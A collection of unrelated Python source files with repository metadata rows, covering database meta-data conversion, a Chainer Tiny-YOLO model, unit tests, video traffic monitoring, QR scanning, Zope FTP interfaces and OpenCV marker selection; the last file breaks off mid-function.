            print "Processing meta-data file %s" % meta_data_file
            # Read the data file
            fh = open(meta_data_file)
            try:
                meta_data_text = fh.read()
            finally:
                fh.close()
            # Convert the meta-data into DB-specific data
            db_data_text = meta_data_text_to_db_data_text(meta_data_text, db_type)
            # Build the DB-specific data file (same basename, new directory)
            db_data_file = os.path.join(output_dir, os.path.basename(meta_data_file))
            fh = open(db_data_file, "w")
            try:
                fh.write(db_data_text)
            finally:
                fh.close()
    elif mode == "insert_file":
        xml_dir_list = options.xml_dirs
        if xml_dir_list is None:
            raise Exception("Missing mandatory argument '--xml_dirs'")
        xml_dir_list = [item.strip() for item in xml_dir_list.split(",")]
        output_file = options.output_file
        if output_file is None:
            raise Exception("Missing mandatory argument '--out'")
        db_statement_sep = options.db_statement_sep
        if db_statement_sep:
            # allow a literal "\n" on the command line to mean a newline
            db_statement_sep = db_statement_sep.replace("\\n", "\n")
        info_and_data_list = []
        meta_data_files = glob.glob(os.path.join(meta_data_dir, "*.dat"))
        for meta_data_file in meta_data_files:
            # Read the corresponding XML table file: first match wins across
            # the configured XML directories
            for xml_dir in xml_dir_list:
                xml_file = os.path.join(xml_dir, "%s.xml" %
                                        os.path.splitext(os.path.basename(meta_data_file))[0])
                if os.path.exists(xml_file):
                    break
            else:
                raise Exception("No XML table file found for meta-data file %s" % meta_data_file)
            table_elt_tree = ET.parse(xml_file)
            table_elt = table_elt_tree.getroot()
            table_info = get_table_info(table_elt)
            # Read the data file
            fh = open(meta_data_file)
            try:
                meta_data_text = fh.read()
            finally:
                fh.close()
            info_and_data_list.append((table_info, meta_data_text))
        output_text = meta_data_to_db_insert_text(info_and_data_list, db_type, db_statement_sep)
        fh = open(output_file, mode="w")
        try:
            fh.write(output_text)
        finally:
            fh.close()
    else:
        raise Exception("Unknown mode: '%s'" % mode)


if __name__ == "__main__":
    main()
| 37.426667 | 109 | 0.652535 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,923 | 0.347108 |
d34dea71189d3afc7d4964aa6dbd49339356c594 | 3,806 | py | Python | YOLOtiny_chainer_v2/YOLOtiny.py | ashitani/ppap_detect | 5aec43e8486c49d106392c926a5a6738ff498ac4 | [
"MIT"
] | 9 | 2016-12-22T00:49:45.000Z | 2020-02-09T02:02:25.000Z | YOLOtiny_chainer_v2/YOLOtiny.py | ashitani/ppap_detect | 5aec43e8486c49d106392c926a5a6738ff498ac4 | [
"MIT"
] | null | null | null | YOLOtiny_chainer_v2/YOLOtiny.py | ashitani/ppap_detect | 5aec43e8486c49d106392c926a5a6738ff498ac4 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
import numpy as np
import chainer
from chainer import cuda, Function, gradient_check, Variable, optimizers, serializers, utils
from chainer import Link, Chain, ChainList
import chainer.functions as F
import chainer.links as L
from chainer import training
from chainer.training import extensions
def darknetConv2D(in_channel, out_channel, bn=True):
    """Build one darknet-style conv block as a chainer Chain.

    Links: ``c`` (3x3 conv, no bias), ``b`` (bias), and -- when ``bn`` is
    True -- ``n`` (batch normalization without beta).
    """
    links = {
        "c": L.Convolution2D(in_channel, out_channel, ksize=3, pad=1, nobias=True),
        "b": L.Bias(shape=[out_channel, ]),
    }
    if bn:
        links["n"] = L.BatchNormalization(out_channel, use_beta=False, eps=0.000001)
    return Chain(**links)
def CRP(c, h, stride=2, pooling=True):
    """Apply one block: convolution -> BN -> bias -> leaky ReLU -> optional max-pool."""
    h = F.leaky_relu(c.b(c.n(c.c(h), test=True)), slope=0.1)
    if not pooling:
        return h
    return F.max_pooling_2d(h, ksize=2, stride=stride, pad=0)
class YOLOtiny(Chain):
    """Tiny-YOLO v2 network: 8 conv+BN blocks (c1-c8) plus a 35-channel
    detection head (c9, bias only, no batch norm)."""

    def __init__(self):
        # `None` input channels let chainer infer them on the first forward pass.
        super(YOLOtiny, self).__init__(
            c1 = darknetConv2D(3,16),
            c2 = darknetConv2D(None,32),
            c3 = darknetConv2D(None,64),
            c4 = darknetConv2D(None,128),
            c5 = darknetConv2D(None,256),
            c6 = darknetConv2D(None,256),
            c7 = darknetConv2D(None,512),
            c8 = darknetConv2D(None,512),
            c9 = darknetConv2D(None,35,bn=False)
        )

    def __call__(self,x):
        return self.predict(x)

    def predict(self,x):
        """Forward pass; returns the raw (1, 35, 13, 13) prediction map for a
        416x416 input."""
        h = CRP(self.c1, x)
        h = CRP(self.c2, h)
        h = CRP(self.c3, h)
        h = CRP(self.c4, h)
        h = CRP(self.c5, h)
        h = CRP(self.c6, h, stride=1)
        # crop to 13x13: slice(1, 14) is h[:, :, 1:14, 1:14]
        # (the original inline comment said 0:13, which was off by one)
        h = F.get_item(h,(slice(None),slice(None),slice(1,14),slice(1,14)))
        h = CRP(self.c7, h, pooling=False)
        h = CRP(self.c8, h, pooling=False)
        h = self.c9.b( self.c9.c(h)) # no leaky relu, no BN
        return h

    def loadCoef(self,filename):
        """Load darknet binary weights (float32 stream) into this chain.

        Layout per conv block: bias, BN gamma, BN running mean, BN running
        variance, then the conv kernel. Assignments are performed via exec on
        generated attribute paths; safe only because the strings are built
        from local integers.
        """
        print "loading",filename
        # NOTE(review): `file` shadows the Python 2 builtin and the handle is
        # never closed.
        file = open(filename,"rb")
        dat=np.fromfile(file,dtype=np.float32)[4:] # skip header(4xint)
        # [in_channels, out_channels] for blocks c1..c8 (all 3x3 kernels)
        layers=[ [3,16],[16,32], [32,64], [64,128],[128,256],[256,256],[256,512],[512,512]]
        offset=0
        for i,l in enumerate(layers):
            in_ch=l[0]
            out_ch=l[1]
            # load bias
            txt= "self.c%d.b.b.data = dat[%d:%d]" % (i+1, offset, offset+out_ch)
            offset+=out_ch
            exec(txt)
            # load bn: gamma, then running mean and variance
            txt= "self.c%d.n.gamma.data = dat[%d:%d]" % (i+1, offset,offset+out_ch)
            offset+=out_ch
            exec(txt)
            txt= "self.c%d.n.avg_mean = dat[%d:%d]" % (i+1, offset,offset+out_ch)
            offset+=out_ch
            exec(txt)
            txt= "self.c%d.n.avg_var = dat[%d:%d]" % (i+1, offset,offset+out_ch)
            offset+=out_ch
            exec(txt)
            # load convolution weight (9 == 3*3 kernel elements per channel pair)
            txt= "self.c%d.c.W.data = dat[%d:%d].reshape(%d,%d,3,3)" % (i+1, offset, offset+(out_ch*in_ch*9), out_ch,in_ch)
            offset+= (out_ch*in_ch*9)
            exec(txt)
            print offset
        # load last convolution weight (c9: 512 -> 35, 1x1 kernel, bias only)
        in_ch=512
        out_ch=35
        txt= "self.c9.b.b.data = dat[%d:%d]" % ( offset, offset+out_ch)
        offset+=out_ch
        exec(txt)
        txt= "self.c9.c.W.data = dat[%d:%d].reshape(%d,%d,1,1)" % ( offset, offset+out_ch*in_ch*1, out_ch,in_ch)
        offset+=out_ch*in_ch*1
        exec(txt)
        print offset
if __name__ == '__main__':
    # Build the network, run a dummy forward pass so chainer can infer the
    # input size of the `None`-channel convolutions, then load the darknet
    # weights and save them as a chainer npz model.
    c=YOLOtiny()
    im=np.zeros((1,3,416,416),dtype=np.float32)
    c.predict(im)
    c.loadCoef("tiny-yolo-ppap_final.weights")
    serializers.save_npz('YOLOtiny_v2.model',c)
| 31.716667 | 123 | 0.558329 | 2,565 | 0.673936 | 0 | 0 | 0 | 0 | 0 | 0 | 535 | 0.140568 |
d3507046f0a495ed119738fbd0af1510a4ac11db | 3,294 | py | Python | prf/tests/test_resource.py | vahana/_prf | ff947003a3675a22730ca3d821fcb2e230575e7d | [
"MIT"
] | null | null | null | prf/tests/test_resource.py | vahana/_prf | ff947003a3675a22730ca3d821fcb2e230575e7d | [
"MIT"
] | 6 | 2015-01-04T14:49:34.000Z | 2017-11-21T16:26:03.000Z | prf/tests/test_resource.py | vahana/_prf | ff947003a3675a22730ca3d821fcb2e230575e7d | [
"MIT"
] | 1 | 2019-11-14T17:16:34.000Z | 2019-11-14T17:16:34.000Z | import mock
import pytest
from prf.tests.prf_testcase import PrfTestCase
from pyramid.exceptions import ConfigurationExecutionError
from prf.resource import Resource, get_view_class, get_parent_elements
from prf.view import BaseView
class TestResource(PrfTestCase):
    """Unit tests for prf.resource.Resource and its module helpers."""

    def test_init_(self):
        # a bare Resource has empty identity fields and no parent
        res = Resource(self.conf)
        assert res.member_name == ''
        assert res.collection_name == ''
        assert res.parent == None  # NOTE(review): `is None` would be idiomatic
        assert res.uid == ''
        with pytest.raises(ValueError):
            #member name cant be empty
            res.add('', view=BaseView)

    def test_repr_(self):
        res = Resource(self.conf, 'member', 'collection', uid='uid')
        assert 'uid' in res.__repr__()

    def test_get_ancestors(self):
        root = Resource(self.conf)
        one = root.add('one', view=BaseView)
        assert one.get_ancestors() == []
        two = one.add('two', view=BaseView)
        anc = two.get_ancestors()
        assert anc[0] == one

    def test_add(self):
        root = Resource(self.conf)
        # default collection name is the pluralized member name
        two = root.add('two', view=BaseView, id_name='two')
        assert two.parent == root
        assert two.member_name == 'two'
        assert two.collection_name == 'twos'
        assert two.uid == 'twos'
        assert two.is_singular is False
        # explicit collection name; uid is colon-joined through the ancestry
        three = two.add('tree', 'trix', view=BaseView, id_name='three')
        assert three.parent == two
        assert three.member_name == 'tree'
        assert three.collection_name == 'trix'
        assert three.uid == 'twos:trix'
        assert three.is_singular is False
        assert three in two.children
        # NOTE(review): `four` is unused; presumably only exercises add() on a
        # grandchild without asserting anything.
        four = three.add('four', view=BaseView)
        # collection_name=None makes a singular resource
        sing = two.add('sing', collection_name=None, view=BaseView)
        assert sing.is_singular is True
        # prefix is prepended to the uid
        pref = root.add('five', prefix='pref', view=BaseView)
        assert pref.uid == 'pref:fives'

    def test_add_id_name(self):
        # id_name customizes the URL placeholder: {<member>_<id_name>}
        root = Resource(self.conf)
        two = root.add('two', view=BaseView, id_name='username')
        assert two.id_name == 'username'
        three = two.add('tree', view=BaseView, id_name='username')
        assert three.path == 'twos/{two_username}/trees'

    @mock.patch('prf.resource.maybe_dotted')
    def test_get_view_class(self, fake_maybe_dotted):
        root = Resource(self.conf)
        fake_maybe_dotted.return_value = BaseView
        # both a class and a dotted-path string resolve to the view class
        assert get_view_class(BaseView, root) == BaseView
        assert get_view_class('prf.view.BaseView', root) == BaseView
        # NOTE(review): reset_mock() at the end of the test is a no-op; the
        # patch is torn down by the decorator anyway.
        fake_maybe_dotted.reset_mock()

    def test_get_parent_elements(self):
        root = Resource(self.conf)
        ppref, npref = get_parent_elements(
            root.add('one', view=BaseView).add('two', view=BaseView).add('three', view=BaseView))
        assert ppref == 'ones/{one_id}/twos/{two_id}'
        assert npref == 'ones:twos:'

    @pytest.mark.skip('route_prefix is broken')
    def test_get_parent_elements_w_route_prefix(self):
        self.conf.route_prefix = 'route_prefix'
        root = Resource(self.conf)
        ppref, npref = get_parent_elements(
            root.add('one', view=BaseView).add('two', view=BaseView).add('three', view=BaseView))
        assert ppref == 'route_prefix/ones/{one_id}/twos/{two_id}'
        assert npref == 'route_prefix:ones:'
| 33.272727 | 101 | 0.632665 | 3,055 | 0.927444 | 0 | 0 | 787 | 0.238919 | 0 | 0 | 468 | 0.142077 |
d35266f4b7ddd35ff7911005944f1b419af759d9 | 2,004 | py | Python | tests/integration/test_aggregator.py | mananpal1997/flake8 | 1c85f3d07c3aadf597db205dff597da2987745f7 | [
"MIT"
] | null | null | null | tests/integration/test_aggregator.py | mananpal1997/flake8 | 1c85f3d07c3aadf597db205dff597da2987745f7 | [
"MIT"
] | null | null | null | tests/integration/test_aggregator.py | mananpal1997/flake8 | 1c85f3d07c3aadf597db205dff597da2987745f7 | [
"MIT"
] | null | null | null | """Test aggregation of config files and command-line options."""
import os
import pytest
from flake8.main import options
from flake8.options import aggregator
from flake8.options import config
from flake8.options import manager
@pytest.fixture
def optmanager():
    """Provide a fresh OptionManager pre-loaded with flake8's default options."""
    option_mgr = manager.OptionManager(
        version="3.0.0",
        plugin_versions="",
        parents=[],
    )
    options.register_default_options(option_mgr)
    return option_mgr
@pytest.fixture
def flake8_config(tmp_path):
    """Write a minimal ``tox.ini`` with a ``[flake8]`` section and return its path."""
    # NOTE(review): the recovered source had its whitespace mangled; the
    # continuation lines below are re-indented as INI multi-line values
    # require -- confirm against the original file.
    cfg_s = """\
[flake8]
ignore =
    E123,
    W234,
    E111
exclude =
    foo/,
    bar/,
    bogus/
quiet = 1
"""
    cfg = tmp_path.joinpath("tox.ini")
    cfg.write_text(cfg_s)
    return str(cfg)
def test_aggregate_options_with_config(optmanager, flake8_config):
    """Verify we aggregate options and config values appropriately."""
    cli_args = [
        "flake8",
        "--select",
        "E11,E34,E402,W,F",
        "--exclude",
        "tests/*",
    ]
    cfg, cfg_dir = config.load_config(flake8_config, [])
    parsed = aggregator.aggregate_options(optmanager, cfg, cfg_dir, cli_args)

    # CLI wins for select/exclude; ignore comes from the config file
    assert parsed.select == ["E11", "E34", "E402", "W", "F"]
    assert parsed.ignore == ["E123", "W234", "E111"]
    assert parsed.exclude == [os.path.abspath("tests/*")]
def test_aggregate_options_when_isolated(optmanager, flake8_config):
"""Verify we aggregate options and config values appropriately."""
arguments = [
"flake8",
"--select",
"E11,E34,E402,W,F",
"--exclude",
"tests/*",
]
cfg, cfg_dir = config.load_config(flake8_config, [], isolated=True)
optmanager.extend_default_ignore(["E8"])
options = aggregator.aggregate_options(optmanager, cfg, cfg_dir, arguments)
assert options.select == ["E11", "E34", "E402", "W", "F"]
assert options.ignore is None
assert options.exclude == [os.path.abspath("tests/*")]
| 24.740741 | 79 | 0.635729 | 0 | 0 | 0 | 0 | 521 | 0.25998 | 0 | 0 | 549 | 0.273952 |
d3529efe0bf0d6df5975b82e93a399f8498bfad6 | 4,091 | py | Python | id/trafficmon/TrafficMain.py | umanium/trafficmon | 86c138bda3c8a3e38fff273e5d61610acee123b5 | [
"MIT"
] | null | null | null | id/trafficmon/TrafficMain.py | umanium/trafficmon | 86c138bda3c8a3e38fff273e5d61610acee123b5 | [
"MIT"
] | null | null | null | id/trafficmon/TrafficMain.py | umanium/trafficmon | 86c138bda3c8a3e38fff273e5d61610acee123b5 | [
"MIT"
] | null | null | null | import os
import cv2
import numpy as np
import time
from backgroundsubtraction.KMeans import KMeans
from objectblob.ObjectBlobDetection import ObjectBlobDetection
from pixelcleaning.MorphologicalCleaning import MorphologicalCleaning
__author__ = 'Luqman'
def morphological(image):
cleaning_model = MorphologicalCleaning()
return cleaning_model
def test(algorithm, vid_src, file_name):
_, frame = vid_src.read()
used_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
model = KMeans(used_frame, 3)
cleaning_model = algorithm(used_frame)
blob_detection = ObjectBlobDetection(used_frame)
n_frame = 0
image_resolution = (0, 0)
min_fps = -1
max_fps = -1
mean_fps = -1
real_fps = vid_src.get(cv2.cv.CV_CAP_PROP_FPS)
# vid_src.get(cv2.CV_CAP_PROP_FPS)
if not os.path.exists("saved_images/"+file_name):
os.makedirs("saved_images/"+file_name)
os.makedirs("saved_images/"+file_name+"/normal")
os.makedirs("saved_images/"+file_name+"/fg")
os.makedirs("saved_images/"+file_name+"/grayscale")
os.makedirs("saved_images/"+file_name+"/clean")
os.makedirs("saved_images/"+file_name+"/contour")
# applying background detection
while frame is not None:
time_start = time.time()
n_frame += 1
# for explanational purpose
# ambil gambar
# if n_frame % 30 == 0:
# cv2.imwrite("saved_images/"+file_name+"/normal/"+repr(n_frame)+".jpg", frame)
used_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
y, x = used_frame.shape
image_resolution = x, y
fg = model.apply(used_frame)
# for explanational purpose
# ambil gambar
# if n_frame % 30 == 0:
# cv2.imwrite("saved_images/"+file_name+"/fg/"+repr(n_frame)+".jpg", fg)
# cv2.imwrite("saved_images/"+file_name+"/grayscale/"+repr(n_frame)+".jpg", used_frame)
fg_use = np.copy(fg)
fg_clean = cleaning_model.apply(fg)
fg_clean_use = np.copy(fg_clean)
# for explanational purpose
# ambil gambar
# if n_frame % 30 == 0:
# cv2.imwrite("saved_images/"+file_name+"/clean/"+repr(n_frame)+".jpg", fg_clean)
# contours
blob_detection.get_contours(fg_clean_use, used_frame)
# cv2.drawContours(frame, contours, -1, (0, 255, 0), 2)
frame_with_contours = blob_detection.draw_blobs(frame)
# print len(contours)
# for explanational purpose
# ambil gambar
# if n_frame % 30 == 0:
# cv2.imwrite("saved_images/"+file_name+"/contour/"+repr(n_frame)+".jpg", frame_with_contours)
time_end = time.time()
cv2.imshow('img', frame_with_contours)
cv2.imshow('fg', fg)
cv2.imshow('fg_clean', fg_clean)
# prev_frame = np.copy(frame)
_, frame = vid_src.read()
if cv2.waitKey(1) & 0xFF == ord('q'):
break
time_process = time_end - time_start
cur_fps = 0
if time_process > 0:
cur_fps = 1. / time_process
# set max / min / mean fps
if (cur_fps > max_fps) or (max_fps == -1):
max_fps = cur_fps
if (cur_fps < min_fps) or (min_fps == -1):
min_fps = cur_fps
if mean_fps == -1:
mean_fps = cur_fps
else:
mean_fps = (0.98 * mean_fps) + (0.02 * cur_fps)
print "--- run statistics ---"
print "image resolution: ", image_resolution
print "total frame: ", n_frame
print "min FPS: ", min_fps
print "max FPS: ", max_fps
print "average FPS: ", mean_fps
print "Video FPS: ", real_fps
if __name__ == '__main__':
import sys
if len(sys.argv) >= 2:
video_src_file = sys.argv[1]
if len(sys.argv) >= 3:
exp_file_name = sys.argv[2]
else:
exp_file_name = "default"
else:
video_src_file = 0
exp_file_name = "default"
# run video
vid = cv2.VideoCapture(video_src_file)
test(morphological, vid, exp_file_name)
| 29.431655 | 106 | 0.611831 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,222 | 0.298704 |
d353025226f0401e819059c39392882f5cc58fad | 2,439 | py | Python | qrscannerpy.py | nunogois/qrscannerpy | 5a84af93c43a8c15aab6fe1851b8dc2110687b9d | [
"MIT"
] | null | null | null | qrscannerpy.py | nunogois/qrscannerpy | 5a84af93c43a8c15aab6fe1851b8dc2110687b9d | [
"MIT"
] | null | null | null | qrscannerpy.py | nunogois/qrscannerpy | 5a84af93c43a8c15aab6fe1851b8dc2110687b9d | [
"MIT"
] | null | null | null | # Imports
import sys, os, time, logging, json
# QR code scanning is on a separate file
from qr import qrscan
# Configuration using config.json
with open('config.json', 'r') as f:
config = json.load(f)
if 'outfile' in config:
outfile = config['outfile']
if 'path' in config:
path = config['path']
extensions = config['extensions']
level = -1
if 'loglevel' in config:
if config['loglevel'] == 'info':
level = logging.INFO
if config['loglevel'] == 'debug':
level = logging.DEBUG
elif config['loglevel'] == 'error':
level = logging.ERROR
if level != -1:
handlers = [logging.StreamHandler(sys.stdout)]
if 'logfile' in config:
handlers.append(logging.FileHandler(filename=config['logfile']))
logging.basicConfig(encoding='utf-8',
level=level, format=config['logformat'],
handlers=handlers)
# Read optional parameters that override config.json
if len(sys.argv) > 2:
path = sys.argv[1]
outfile = sys.argv[2]
elif len(sys.argv) > 1:
path = sys.argv[1]
# File scan function
def filescan(filepath):
try:
if extensions.count(os.path.splitext(filepath)[1].lower()) > 0:
logging.info('Scanning file: %s', filepath)
start = time.time()
codes = qrscan(filepath)
if len(codes) > 0:
logging.info('Found %s code' + ('s' if len(codes) >
1 else '') + ': %s', len(codes), codes)
else:
logging.info('No codes found.')
file_time = time.time() - start
logging.info('Scanned in %ss', round(file_time, 2))
return codes
except Exception as e:
logging.error('Error: %s', e)
# Initiate empty codes list
codes = []
# Start scanning with both single file and directory support, appending to our codes list
if os.path.isfile(path):
filecodes = filescan(path)
codes.append({
'file': path,
'codes': filecodes
})
elif os.path.isdir(path):
start = time.time()
for file in os.listdir(path):
filepath = os.path.join(path, os.fsdecode(file))
filecodes = filescan(filepath)
codes.append({
'file': filepath,
'codes': filecodes
})
logging.info('All scans finished in %ss', round(time.time() - start, 2))
else:
logging.error('Invalid path.')
# Output if codes were found
if len(codes) > 0 and outfile:
with open(outfile, 'w') as out:
json.dump(codes, out, indent=2)
logging.info('Codes available in %s', outfile) | 28.034483 | 89 | 0.633866 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 635 | 0.260353 |
d3531e57298807b91066e04d1ce5acf961f78599 | 4,566 | py | Python | src/zope/app/publisher/interfaces/ftp.py | zopefoundation/zope.app.publisher | 7c7aea272a8c4cd10ef97264f8f48766368ceefb | [
"ZPL-2.1"
] | 1 | 2019-12-04T12:52:44.000Z | 2019-12-04T12:52:44.000Z | src/zope/app/publisher/interfaces/ftp.py | zopefoundation/zope.app.publisher | 7c7aea272a8c4cd10ef97264f8f48766368ceefb | [
"ZPL-2.1"
] | 6 | 2017-05-05T11:53:40.000Z | 2020-06-08T13:49:42.000Z | src/zope/app/publisher/interfaces/ftp.py | zopefoundation/zope.app.publisher | 7c7aea272a8c4cd10ef97264f8f48766368ceefb | [
"ZPL-2.1"
] | 2 | 2015-04-03T08:00:16.000Z | 2020-06-09T10:06:15.000Z | ##############################################################################
#
# Copyright (c) 2001, 2002 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
"""Virtual File System interfaces for the publisher.
$Id$
"""
from zope.publisher.interfaces.ftp import IFTPPublisher, IFTPView
class IFTPDirectoryPublisher(IFTPPublisher, IFTPView):
def type(name):
"""Return the file type at the given name
The return valie is 'd', for a directory, 'f', for a file, and
None if there is no file at the path.
"""
def names(filter=None):
"""Return a sequence of the names in a directory
If the filter is not None, include only those names for which
the filter returns a true value.
"""
def ls(filter=None):
"""Return a sequence of information objects
Return item info objects (see lsinfo) for the files in a directory.
If the filter is not None, include only those names for which
the filter returns a true value.
"""
def readfile(name, outstream, start=0, end=None):
"""Outputs the file at name to a stream.
Data are copied starting from start. If end is not None,
data are copied up to end.
"""
def lsinfo(name):
"""Return information for a unix-style ls listing for the path
Data are returned as a dictionary containing the following keys:
type
The path type, either 'd' or 'f'.
owner_name
Defaults to "na". Must not include spaces.
owner_readable
defaults to True
owner_writable
defaults to True
owner_executable
defaults to True for directories and false otherwise.
group_name
Defaults to "na". Must not include spaces.
group_readable
defaults to True
group_writable
defaults to True
group_executable
defaults to True for directories and false otherwise.
other_readable
defaults to False
other_writable
defaults to False
other_executable
defaults to True for directories and false otherwise.
mtime
Optional time, as a datetime.
nlinks
The number of links. Defaults to 1.
size
The file size. Defaults to 0.
name
The file name.
"""
def mtime(name):
"""Return the modification time for the file
Return None if it is unknown.
"""
def size(name):
"""Return the size of the file at path
"""
def mkdir(name):
"""Create a directory.
"""
def remove(name):
"""Remove a file. Same as unlink.
"""
def rmdir(name):
"""Remove a directory.
"""
def rename(old, new):
"""Rename a file or directory.
"""
def writefile(name, instream, start=None, end=None, append=False):
"""Write data to a file.
If start or end is not None, then only part of the file is
written. The remainder of the file is unchanged.
If start or end are specified, they must ne non-negative.
If end is None, then the file is truncated after the data are
written. If end is not None, parts of the file after end, if
any, are unchanged. If end is not None and there isn't enough
data in instream to fill out the file, then the missing data
are undefined.
If neither start nor end are specified, then the file contents
are overwritten.
If start is specified and the file doesn't exist or is shorter
than start, the file will contain undefined data before start.
If append is true, start and end are ignored.
"""
def writable(name):
"""Return boolean indicating whether a file at path is writable
Note that a true value should be returned if the file doesn't
exist but it's directory is writable.
"""
| 25.50838 | 78 | 0.597678 | 3,792 | 0.830486 | 0 | 0 | 0 | 0 | 0 | 0 | 3,924 | 0.859396 |
d353829766a83bdaaf1d9647932561620e2d8f0c | 49 | py | Python | lankuai/lankuai/lkitsm/project/workfolw/__init__.py | abiner/lankuai | 55a3631528acf1c46a471cb0616e28a5396faab5 | [
"MIT"
] | null | null | null | lankuai/lankuai/lkitsm/project/workfolw/__init__.py | abiner/lankuai | 55a3631528acf1c46a471cb0616e28a5396faab5 | [
"MIT"
] | null | null | null | lankuai/lankuai/lkitsm/project/workfolw/__init__.py | abiner/lankuai | 55a3631528acf1c46a471cb0616e28a5396faab5 | [
"MIT"
] | null | null | null | default_app_config='workfolw.apps.WorkfolwConfig' | 49 | 49 | 0.897959 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 30 | 0.612245 |
d35417a4cf00badf31eab6d25dadb13c434cb246 | 1,176 | py | Python | release/stubs.min/Autodesk/Revit/DB/__init___parts/NamingUtils.py | YKato521/ironpython-stubs | b1f7c580de48528490b3ee5791b04898be95a9ae | [
"MIT"
] | null | null | null | release/stubs.min/Autodesk/Revit/DB/__init___parts/NamingUtils.py | YKato521/ironpython-stubs | b1f7c580de48528490b3ee5791b04898be95a9ae | [
"MIT"
] | null | null | null | release/stubs.min/Autodesk/Revit/DB/__init___parts/NamingUtils.py | YKato521/ironpython-stubs | b1f7c580de48528490b3ee5791b04898be95a9ae | [
"MIT"
] | null | null | null | class NamingUtils(object):
""" A collection of utilities related to element naming. """
@staticmethod
def CompareNames(nameA, nameB):
"""
CompareNames(nameA: str,nameB: str) -> int
Compares two object name strings using Revit's comparison rules.
nameA: The first object name to compare.
nameB: The second object name to compare.
Returns: An integer indicating the result of the lexical comparison between the two
names.
Less than zero if nameA comes before nameB in the ordering,zero if
nameA and nameB are equivalent,
and greater than zero if nameA is comes
after nameB in the ordering.
"""
pass
@staticmethod
def IsValidName(string):
"""
IsValidName(string: str) -> bool
Identifies if the input string is valid for use as an object name in Revit.
string: The name to validate.
Returns: True if the name is valid for use as a name in Revit,false if it contains
prohibited characters and is invalid.
"""
pass
__all__ = [
"CompareNames",
"IsValidName",
]
| 21 | 88 | 0.62585 | 1,174 | 0.998299 | 0 | 0 | 991 | 0.842687 | 0 | 0 | 937 | 0.796769 |
d355eb31c252b769e1ab39ae5b0f49c3fa0a1e7d | 1,616 | py | Python | testing/marker.py | knosmos/robowordle | 4b4f0796795fad32c0021a82fde1da597c4d9d6f | [
"MIT"
] | 2 | 2022-03-07T17:30:41.000Z | 2022-03-11T00:48:22.000Z | testing/marker.py | knosmos/robowordle | 4b4f0796795fad32c0021a82fde1da597c4d9d6f | [
"MIT"
] | null | null | null | testing/marker.py | knosmos/robowordle | 4b4f0796795fad32c0021a82fde1da597c4d9d6f | [
"MIT"
] | null | null | null | import cv2
import numpy as np
from rich import print
dewarped = cv2.imread('../dewarped.png')
'''
SIZE = 600
# Get ROI corners
arucoDict = cv2.aruco.Dictionary_get(cv2.aruco.DICT_APRILTAG_36h11)
arucoParams = cv2.aruco.DetectorParameters_create()
(corners, ids, rejected) = cv2.aruco.detectMarkers(image, arucoDict, parameters=arucoParams)
assert len(corners) == len(ids) == 4
detected = [[ids[i], corners[i]] for i in range(4)]
detected.sort(key = lambda x: x[0])
print(detected)
bounding_box = [
detected[0][1][0][2],
detected[1][1][0][3],
detected[2][1][0][0],
detected[3][1][0][1]
]
img_boxed = image.copy()
cv2.polylines(img_boxed, np.int32([bounding_box]), True, (0, 255, 0), 2)
# cv2.imshow('Fiducial Detection', img_boxed)
# Dewarp
vertices = [
[0, 0],
[SIZE, 0],
[SIZE, SIZE],
[0, SIZE]
]
matrix = cv2.getPerspectiveTransform(np.float32(bounding_box), np.float32(vertices))
dewarped = cv2.warpPerspective(image, matrix, (SIZE, SIZE))
cv2.imwrite('dewarped.png', dewarped)
'''
cv2.imshow('Dewarped', dewarped)
# Marker selection
markers = []
def selectMarker(event, x, y, flags, param):
global markers, dewarped
if event == cv2.EVENT_LBUTTONDOWN:
markers.append((x, y))
print(f'Marker {len(markers)} selected at ({x}, {y})')
dewarped = cv2.circle(dewarped, (x,y), radius=5, color=(0, 0, 255), thickness=-1)
if len(markers) == 27:
print('All 27 markers selected')
print(markers)
cv2.imshow('Dewarped', dewarped)
cv2.setMouseCallback('Dewarped', selectMarker)
cv2.waitKey()
cv2.destroyAllWindows() | 27.389831 | 92 | 0.665223 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,065 | 0.659035 |
d356028a1d23727819e8b944349fe8854b9a9ae6 | 3,699 | py | Python | src/trusted/validator_ragel/trie_test.py | cohortfsllc/cohort-cocl2-sandbox | 0ac6669d1a459d65a52007b80d5cffa4ef330287 | [
"BSD-3-Clause"
] | 2,151 | 2020-04-18T07:31:17.000Z | 2022-03-31T08:39:18.000Z | src/trusted/validator_ragel/trie_test.py | cohortfsllc/cohort-cocl2-sandbox | 0ac6669d1a459d65a52007b80d5cffa4ef330287 | [
"BSD-3-Clause"
] | 395 | 2020-04-18T08:22:18.000Z | 2021-12-08T13:04:49.000Z | src/trusted/validator_ragel/trie_test.py | cohortfsllc/cohort-cocl2-sandbox | 0ac6669d1a459d65a52007b80d5cffa4ef330287 | [
"BSD-3-Clause"
] | 338 | 2020-04-18T08:03:10.000Z | 2022-03-29T12:33:22.000Z | #!/usr/bin/python
# Copyright (c) 2014 The Native Client Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import unittest
import trie
class TrieTest(unittest.TestCase):
def MakeUncompressedTrie(self):
uncompressed = trie.Node()
accept = trie.AcceptInfo(input_rr='%eax', output_rr='%edx')
trie.AddToUncompressedTrie(uncompressed, ['0', '1', '2'], accept)
trie.AddToUncompressedTrie(uncompressed, ['0', '1', '2', '3'], accept)
trie.AddToUncompressedTrie(uncompressed, ['0', '1', '3'], accept)
trie.AddToUncompressedTrie(uncompressed, ['0', '1', '4'], accept)
trie.AddToUncompressedTrie(uncompressed, ['0', '1', '5'], accept)
return uncompressed
def CheckTrieAccepts(self, accept_sequences):
accept = trie.AcceptInfo(input_rr='%eax', output_rr='%edx')
